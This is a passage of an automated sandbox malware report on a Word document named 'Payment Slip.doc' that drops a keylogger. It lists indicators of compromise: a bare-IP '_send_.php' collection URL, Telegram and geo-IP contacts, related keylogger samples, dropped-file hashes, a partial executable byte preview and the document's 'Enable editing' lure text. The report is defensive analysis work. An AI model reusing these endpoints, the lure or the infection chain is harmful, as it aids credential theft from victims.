                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedvvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          132.226.8.169
                          		checkip.dyndns.comUnited States
                          		16989UTMEMUSfalse
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          188.114.97.3
                          		unknownEuropean Union
                          		13335CLOUDFLARENETUSfalse
                          66.63.187.123
                          		unknownUnited States
                          		8100ASN-QUADRANET-GLOBALUStrue
                          193.122.6.168
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          188.114.96.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          193.122.130.0
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          158.101.44.242
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          132.226.247.73
                          		unknownUnited States
                          		16989UTMEMUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519173
                          Start date and time:2024-09-26 07:46:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Payment Slip.doc
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@23/9
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 56
                          • Number of non-executed functions: 120
                          Cookbook Comments:
                          • Found application associated with file extension: .doc
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Active ActiveX Object
                          • Scroll down
                          • Close Viewer
                          • Override analysis time to 76845.7787459055 for current running targets taking high CPU consumption
                          • Override analysis time to 153691.557491811 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 3360 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Payment Slip.doc

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:47:15API Interceptor330x Sleep call for process: EQNEDT32.EXE modified
                          01:47:21API Interceptor8467010x Sleep call for process: vvndewepeter91026.exe modified
                          01:47:23API Interceptor21x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          132.226.8.169rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Products List.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          149.154.167.220https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                    SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              188.114.97.3http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                              • www.tiktok758.com/img/logo.4c830710.svg
                                              TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                              • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                              PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.rtprajalojago.live/2wnz/
                                              (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                              • dddotx.shop/Mine/PWS/fre.php
                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/DiF66Hbf/download
                                              http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • easyantrim.pages.dev/id.html
                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/13rSMZZi/download
                                              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                              • www.rtpngk.xyz/yhsl/
                                              PO-001.exeGet hashmaliciousFormBookBrowse
                                              • www.x0x9x8x8x7x6.shop/assb/
                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                              • www.cc101.pro/4hfb/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              api.telegram.orghttps://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              checkip.dyndns.comSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUhttp://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                              • 149.154.167.99
                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              https://live-prons-sex.pages.dev/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://singaporeprivacygroup.vipsg3.my.id/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              CLOUDFLARENETUSTelco 32pcs New Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              envifa.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.19.24
                                              https://redfoxgroup.ladesk.com/402755-APARGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              https://docs-i-trezor.github.io/en-us/Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              http://banlombiasucursalvirtughasd.vercel.app/Get hashmaliciousUnknownBrowse
                                              • 104.26.0.188
                                              https://cutt.ly/EeUeu5Iy/Get hashmaliciousUnknownBrowse
                                              • 172.67.8.238
                                              https://start-m-trezar.github.io/Get hashmaliciousHTMLPhisherBrowse
                                              • 104.16.96.114
                                              https://check-hticompialnt520842.com/sign-in?op_token=6QouodMTj42Y9R6vu7f7F4jkiiAw5e0RnP0YJ7kaakP7NW4bImz7RzENOq9XAroPzLQq7OQtDzJlNnfUSwkvnHQF3HnsYuhEh8y&uuid=3334009b-8512-457f-a8c7-c29303c4adbc&hash=lrio35yeh&language=enGet hashmaliciousUnknownBrowse
                                              • 104.18.86.42
                                              https://lmoriw-iekascma-oqmmcq-213-cmakwe-fgacsax.pages.dev/robots.txt/Get hashmaliciousHTMLPhisherBrowse
                                              • 172.67.74.152
                                              https://expressss-venezuela.pages.dev/robots.txt/Get hashmaliciousUnknownBrowse
                                              • 172.66.47.120
                                              UTMEMUSz95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 132.226.247.73
                                              cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.8.169
                                              ASN-QUADRANET-GLOBALUShttp://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 103.79.78.105
                                              Sept order.docGet hashmaliciousFormBookBrowse
                                              • 66.63.187.123
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 66.63.187.123
                                              rPROFORMAINVOICE-PO_ATS_1036.exeGet hashmaliciousXWormBrowse
                                              • 67.215.224.133
                                              34467890.docGet hashmaliciousUnknownBrowse
                                              • 66.63.187.123
                                              Swift.docGet hashmaliciousAgentTeslaBrowse
                                              • 66.63.187.123
                                              XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 192.161.184.44
                                              BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                              • 66.63.187.123
                                              https://2836500.vip/Get hashmaliciousUnknownBrowse
                                              • 27.0.235.55
                                              #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                              • 45.95.233.246

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                              • 188.114.96.3
                                              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                              • 188.114.96.3
                                              US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.96.3
                                              36f7277af969a6947a61ae0b815907a1Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                              • 149.154.167.220
                                              RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                              • 149.154.167.220
                                              RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                              • 149.154.167.220
                                              SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exe

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):704000
                                              Entropy (8bit):7.875943883609069
                                              Encrypted:false
                                              SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                              MD5:42F2CE52A57E0D72EAC297A532354E42
                                              SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                              SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                              SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@.................................$...O........ ........................................................................... ............... ..H............text...|.... ...................... ..`.rsrc.... ......."..................@..@.reloc..............................@..B................X.......H........Y..\5..........,....&...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{157143B9-2766-47C9-9254-225D23463B9D}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17D0AF65-F169-479E-942C-DF6319E03037}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007243
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbA:IiiiiiiiiifdLloZQc8++lsJe1Mzv
                                              MD5:B9DE074B26F93378087E65632F5B3E54
                                              SHA1:0521D122DB3C1EF4D9647CAF952FB54EBF12A981
                                              SHA-256:462BD338357DAB74AF45A1DDF6F2D14257BE8013E95D7E88DD8A029921C0E1BD
                                              SHA-512:7D20666DD9907436357EBA3CF9DDE0DFFA84B01192477BD483B4EC3EEB9730A28E3A7D51C4EFB951F2E8230CC6A85753B82464441AFD2A29591E946856C0CE5E
                                              Malicious:false
                                              Reputation:low
                                              Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D8964A50-9018-4193-BC8F-CBF79CAD82D1}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FA07FD67-C9F0-495C-98E7-E2F3E4913787}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):101888
                                              Entropy (8bit):3.626890352321919
                                              Encrypted:false
                                              SSDEEP:1536:CSyemuSyemuSyemuSyemuSyem3gkMtyhFN7XO:Hyemryemryemryemryem3gtQj5XO
                                              MD5:23B9DD35BCE6003977F6FB8B7F75ACDC
                                              SHA1:90E94F1F7BC1AE3975CC58675C47AB62AD099868
                                              SHA-256:B1DB9634EF459F1E23ECC9C9AE3D5FEF92455559B024DB9390033CBADFA516EB
                                              SHA-512:9C24FBFDCA2C67988C3AE6D790A8ECC591E5AF02DF14424E388B23671870EE1161BFC26C80864D4E24A0C60BCD717E4FFB71D340C539741F6285758912CE7E01
                                              Malicious:false
                                              Preview:5.3.6.4.7.8.0.0.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                              C:\Users\user\AppData\Local\Temp\dpgelmzw.jik.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
